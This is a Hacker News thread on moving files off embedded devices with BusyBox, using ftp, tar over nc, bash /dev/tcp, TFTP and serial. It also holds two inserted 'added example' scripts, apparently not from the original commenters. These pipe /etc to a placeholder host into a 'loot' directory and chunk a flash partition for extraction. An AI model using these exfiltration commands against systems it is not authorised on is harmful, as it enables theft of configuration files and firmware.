
Exfiltrating files with BusyBox - internetwache
https://bitquark.co.uk/blog/2016/10/03/exfiltrating_files_with_busybox
======
dfc
That was a let down. Is it really "exfiltration" when you use a protocol
designed for mass data transfer and you use it in the exact manner it was
intended to be used? The less linkbaity title is "Transferring files with
BusyBox's ftp"

~~~
bitquark
The point of the post was to show how easy it is, as people seem to miss these
commands or may not be aware of how easy it is to set up a listening service.
It's exfiltration by definition, but you are of course free to mangle the data
any way you want or use DNS techniques if you really care about hiding what
you're doing, but that's a different post.

~~~
dfc
What is your definition of exfiltration? Or more importantly how do you
distinguish between exfil and normal transfer by an authorized user?

------
bcook
I very much prefer using "tar" and "nc".

Example:

    Host1: tar -cf - /file1 /file2 | nc -l -p 54321

    Host2: nc host1 54321 | tar -xf -
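The same tar-over-a-pipe transfer as an added example (not code from this comment or the linked post), with one addition a practitioner usually wants: a SHA256SUMS manifest inside the stream, so the receiving side can tell a complete transfer from a truncated one, since nc gives no such signal. The transport is a plain pipe so the script runs offline; over the network the sender pipes pack_tree into "nc -l -p 54321" and the receiver runs "nc host1 54321 | unpack_tree /where" (host1 and the port are placeholders). It assumes GNU tar for the two -C arguments; BusyBox tar takes a single -C, so there the manifest would have to be written into the source tree.

```sh
#!/bin/sh
# Added example, not code from the thread: tar over a pipe plus a manifest.
# Transport here is a pipe; on the wire use nc (or bash's /dev/tcp) on both ends.

pack_tree() {
  # $1 = directory to ship. Writes a tar stream to stdout containing the
  # tree plus SHA256SUMS. The manifest is built in a temp dir so a read-only
  # source tree (typical for device firmware) still works.
  dir=$1
  tmp=$(mktemp -d) || return 1
  ( cd "$dir" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum ) \
    > "$tmp/SHA256SUMS" || { rm -rf "$tmp"; return 1; }
  # GNU tar: each -C applies to the names that follow it (assumption: GNU tar).
  # BusyBox tar takes a single -C, so drop SHA256SUMS into $dir there instead.
  tar -cf - -C "$dir" . -C "$tmp" SHA256SUMS
  rc=$?
  rm -rf "$tmp"
  return $rc
}

verify_tree() {
  # $1 = extracted tree. Exit 0 only if every manifest entry matches.
  ( cd "$1" && sha256sum -c SHA256SUMS >/dev/null 2>&1 )
}

unpack_tree() {
  # $1 = destination. Reads the tar stream from stdin, extracts, then verifies.
  dest=$1
  mkdir -p "$dest" || return 1
  tar -C "$dest" -xf - || return 1
  verify_tree "$dest"
}

# Wire usage (hostname and port are placeholders):
#   receiver:  nc -l -p 54321 | unpack_tree /srv/loot
#   sender:    pack_tree /etc | nc host1 54321
```

If the sender has bash but no nc, the same stream can be written to bash's /dev/tcp pseudo-device instead of piping into nc; the receiving side still needs something listening. The manifest is what makes a cut connection visible: a stream that stops early either fails to extract or lands without SHA256SUMS, and verify_tree fails either way.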

~~~
kjetijor
If you have bash, you can even partially get by without netcat as well. Bash
has the wonderful "fake" devicenodes, /dev/tcp/host/port and
/dev/udp/host/port.

~~~
jandrese
If your system is running busybox you usually won't have full fat bash.

One thing that annoys me is how people will crack a quad-core 1.6GHz
smartphone with 64GB of storage and then install busybox to save those 50MB
over a regular shell environment that won't embarrass itself on every shell
script or configure script.

~~~
voltagex_
It's easier to cross-compile busybox (or toybox) than Bash. Cross compiling
for Linux is annoying, cross compiling for Android is even more annoying.

------
_kst_
The ftpput and ftpget commands might not be available even as arguments to the
busybox command, depending on how it was configured at build time.

    # type ftpput
    -sh: type: ftpput: not found
    # busybox ftpput
    busybox: applet not found
    #

Likewise for "nc".

~~~
voltagex_
I've used similar things to get a dump of router/modem firmware.

Busybox can be built with as many or as few applets as you want. If the
busybox you have access to doesn't have what you need, you could always try
putting another busybox in /tmp -
[https://busybox.net/downloads/binaries/](https://busybox.net/downloads/binaries/)
should have a static binary that works on whatever device you have.

------
mjevans
Don't forget that these stupid little devices nearly ALWAYS have a webserver
running //somewhere// on them.

If you really need to get some data off, look at how much memory you have and
just window the copied data in to files you can DL.

Many of the less expensive and crappier ones ship with very little memory,
very little flash, and a VERY restrictive busybox build.

Still, somewhere between that and the kernel are going to be the tools you
need to get chunks of data out.
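An added example of the windowing idea above (not code from this comment): size the pieces to the RAM-backed /tmp the device actually has, split the capture with split(1), record a hash per piece, and rebuild on the receiving side only if every piece is intact. Getting the pieces off the box (the device's own web server, tftp, ftpput) is transport-specific and left out; the chunk size fallback of 1 MiB and the quarter-of-MemAvailable rule are assumptions for the demo, not figures from the thread.

```sh
#!/bin/sh
# Added example, not from the thread: chunk a large capture to fit in tmpfs,
# hash each piece, reassemble with verification on the other side.

chunk_budget() {
  # Bytes we are willing to hold in RAM-backed /tmp at once: a quarter of
  # MemAvailable (assumed rule of thumb), or 1 MiB when /proc/meminfo is absent.
  if [ -r /proc/meminfo ]; then
    awk '/^MemAvailable:/ { printf "%.0f\n", $2 * 1024 / 4; found = 1 }
         END { if (!found) print 1048576 }' /proc/meminfo
  else
    echo 1048576
  fi
}

chunk_file() {
  # $1 = source file, $2 = chunk size in bytes, $3 = output directory.
  # split(1) names the pieces part.aa, part.ab, ... so a shell glob sorts them.
  # Both split -b and sha256sum exist as BusyBox applets when enabled at build.
  src=$1; size=$2; out=$3
  mkdir -p "$out" || return 1
  split -b "$size" "$src" "$out/part." || return 1
  ( cd "$out" && sha256sum part.* > MANIFEST )
}

reassemble() {
  # $1 = directory holding the downloaded pieces, $2 = output file.
  # Refuse to rebuild if any piece is missing, short or corrupt.
  ( cd "$1" && sha256sum -c MANIFEST >/dev/null 2>&1 ) || return 1
  cat "$1"/part.* > "$2"
}

# Usage on the device (paths are placeholders):
#   chunk_file /dev/mtdblock0 "$(chunk_budget)" /tmp/parts
# then fetch /tmp/parts/* and MANIFEST, and on the workstation:
#   reassemble ./parts firmware.bin
```

Pulling MANIFEST across first is worth the extra request: it tells you up front how many pieces to expect, and a piece that was cut short by a flaky HTTP download shows up as a hash mismatch rather than as silent corruption in the middle of the reassembled image.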

------
jlgaddis
We ($work) have some embedded devices running BusyBox and I typically just use
TFTP. It's simple, it works, and we already have an internal TFTP server.

------
pbnjay
I had to get some files off/on a hacked device over a serial port (networking
was broken). Luckily the BusyBox included uuencode/decode so I didn't have to
get too extreme.

"Exfiltrating" implies a covert action... Using ftp is kinda obvious!

------
mynameislegion
BusyBox also has wget and an httpd.

